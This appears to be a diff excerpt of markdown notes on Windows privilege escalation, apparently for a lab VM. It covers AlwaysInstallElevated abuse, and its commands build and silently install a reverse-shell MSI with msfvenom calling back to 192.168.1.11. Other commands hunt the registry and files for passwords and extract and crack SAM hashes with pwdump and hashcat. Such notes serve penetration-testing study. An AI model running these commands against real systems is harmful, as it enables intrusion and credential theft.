ilkinur/tools-examples-use_guideline/examples/windows_privesc.md

 If we can write to a location Windows checks before the actual executable, we can trick the service into executing it instead.

+#### AlwaysInstallElevated

+MSI files are package files used to install applications.
+These files run with the permissions of the user trying to install them.
+Windows allows for these installers to be run with elevated (i.e. admin) privileges.
+If this is the case, we can generate a malicious MSI file which contains a reverse shell.

+The catch is that two Registry settings must be enabled for this to work.
+The “AlwaysInstallElevated” value must be set to 1 for both the local machine:
+`HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`
+and the current user:
+`HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`
+If either of these are missing or disabled, the exploit will not work.

+ Use winPEAS to see if both registry values are set:
+`.\winPEASany.exe quiet windowscreds`
+Alternatively, verify the values manually:
+`reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
+`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`

+Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension:
+`msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.11 LPORT=53 -f msi -o reverse.msi`
+Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit:
+`msiexec /quiet /qn /i C:\PrivEsc\reverse.msi`

+#### Passwords

+The following commands will search the registry for keys and values that contain “password”
+`reg query HKLM /f password /t REG_SZ /s`
+`reg query HKCU /f password /t REG_SZ /s`

+Use winPEAS to check common password locations:
+`.\winPEASany.exe quiet filesinfo userinfo`

+Use winPEAS to check for saved credentials:
+`.\winPEASany.exe quiet cmd windowscreds`
+We can verify this manually using the following command:
+`cmdkey /list`

+#### Configuration Files

+Recursively search for files in the current directory with “pass” in the name, or ending in “.config”:
+`dir /s *pass* == *.config`
+Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt:
+`findstr /si password *.xml *.ini *.txt`
+Use winPEAS to search for common files which may contain credentials:
+`.\winPEASany.exe quiet cmd searchfast filesinfo`

+#### SAM/SYSTEM Locations

+The SAM and SYSTEM files are located in the C:\Windows\System32\config directory.
+The files are locked while Windows is running.
+Backups of the files may exist in the C:\Windows\Repair or C:\Windows\System32\config\RegBack directories.

+Run the pwdump tool against the SAM and SYSTEM files to extract the hashes:
+`python2 creddump7/pwdump.py SYSTEM SAM`
+Crack the admin user hash using hashcat:
+`hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da rockyou.txt`

+#### Scheduled Tasks

+List all scheduled tasks your user can see:
+`schtasks /query /fo LIST /v`
+In PowerShell:
+`Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State`

 ### PrivescCheck
 ```cmd